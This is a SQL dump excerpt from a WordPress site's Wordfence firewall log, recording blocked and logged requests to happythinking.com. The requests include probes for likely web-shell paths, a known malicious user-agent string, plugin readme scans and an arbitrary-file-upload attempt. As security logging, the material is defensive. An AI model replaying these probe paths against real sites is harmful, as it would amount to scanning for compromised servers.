(50812, 1712000568.289605, 1712000567.800800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(50623, 1711731957.667055, 1711731957.336300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-includes/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtaW5jbHVkZXMvZHJvcGRvd24ucGhw","category":"brute-force","ssl":1}'),
(50708, 1711810290.099930, 1711810289.496500, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/updates.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(50556, 0.000000, 1711554639.650352, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹2&', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50557, 0.000000, 1711583767.230650, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50558, 1711583778.595263, 1711583778.236500, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50559, 1711583777.417275, 1711583777.068200, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50411, 1711258360.352149, 1711258359.881000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://mail.happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50596, 1711720217.815552, 1711720217.504700, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hYm91dC5waHA=","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(50281, 0.000000, 1711079155.938490, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50658, 1711731899.238627, 1711731898.945000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/maint/maint/ajax-actions.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vbWFpbnQvbWFpbnQvYWpheC1hY3Rpb25zLnBocA==","category":"brute-force","ssl":1}'),
(50615, 1711731974.685422, 1711731974.332300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/coffee/marijuana.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy9jb2ZmZWUvbWFyaWp1YW5hLnBocA==","category":"brute-force","ssl":1}'),
(50598, 1711720156.024073, 1711720155.703200, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50599, 1711720126.239024, 1711720125.810800, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50600, 0.000000, 1711724660.633699, '\0\0\0\0\0\0\0\0\0\0ÿÿeW', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50601, 0.000000, 1711725783.295613, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹á!', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50602, 1711731999.070974, 1711731998.701600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/themes/ccx/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC90aGVtZXMvY2N4L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50603, 1711731997.578783, 1711731997.197200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/ccx/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL2NjeC9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50608, 1711731986.706159, 1711731986.285900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///css/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vY3NzL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50289, 1711080809.388419, 1711080808.995300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50423, 1711358586.250172, 1711358585.867700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50290, 1711080805.930728, 1711080805.610100, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50927, 1712082462.735766, 1712082462.228700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(51647, 1712367596.342068, 1712367595.999400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-networking-e-commerce-1/social/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvc29jaWFsL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvc29jaWFsL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51661, 1712367962.414221, 1712367961.988100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/genesis-simple-defaults/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3372.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nZW5lc2lzLXNpbXBsZS1kZWZhdWx0cy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nZW5lc2lzLXNpbXBsZS1kZWZhdWx0cy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51655, 1712367960.228053, 1712367959.842200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wysija-newsletters/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93eXNpamEtbmV3c2xldHRlcnMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93eXNpamEtbmV3c2xldHRlcnMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51650, 1712367595.111799, 1712367594.658000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-networking-e-commerce-1/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtbmV0d29ya2luZy1lLWNvbW1lcmNlLTEvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51653, 1712367941.918159, 1712367941.607400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/addblockblocker/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:122.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGRibG9ja2Jsb2NrZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGRibG9ja2Jsb2NrZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51654, 1712367960.228387, 1712367959.842200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wysija-newsletters/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93eXNpamEtbmV3c2xldHRlcnMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93eXNpamEtbmV3c2xldHRlcnMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51675, 1712368000.422231, 1712368000.061000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/power-zoomer/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wb3dlci16b29tZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wb3dlci16b29tZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51674, 1712368001.688293, 1712368001.354100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/slide-show-pro/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.94 Safari/537.36 OPR/68.3.2106.252', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbGlkZS1zaG93LXByby9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbGlkZS1zaG93LXByby9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51673, 1712368001.688517, 1712368001.354100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/slide-show-pro/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.94 Safari/537.36 OPR/68.3.2106.252', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbGlkZS1zaG93LXByby9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbGlkZS1zaG93LXByby9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51651, 1712367607.827650, 1712367607.267900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2; rv:58.0.1) Gecko/20100101 Firefox/58.0.1', 'blocked:waf', 'N-Media Post Front-end Form < 1.1 - Arbitrary File Upload', '{"learningMode":0,"failedRules":"69","paramKey":"c2VydmVyLmVtcHR5","paramValue":"bnVsbA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wZXVnZW90LW11c2ljLXBsdWdpbi9qcy9wbHVwbG9hZC9leGFtcGxlcy91cGxvYWQucGhw","category":"file_upload","ssl":1}'),
(51652, 1712367941.918402, 1712367941.607400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/addblockblocker/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:122.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGRibG9ja2Jsb2NrZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGRibG9ja2Jsb2NrZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
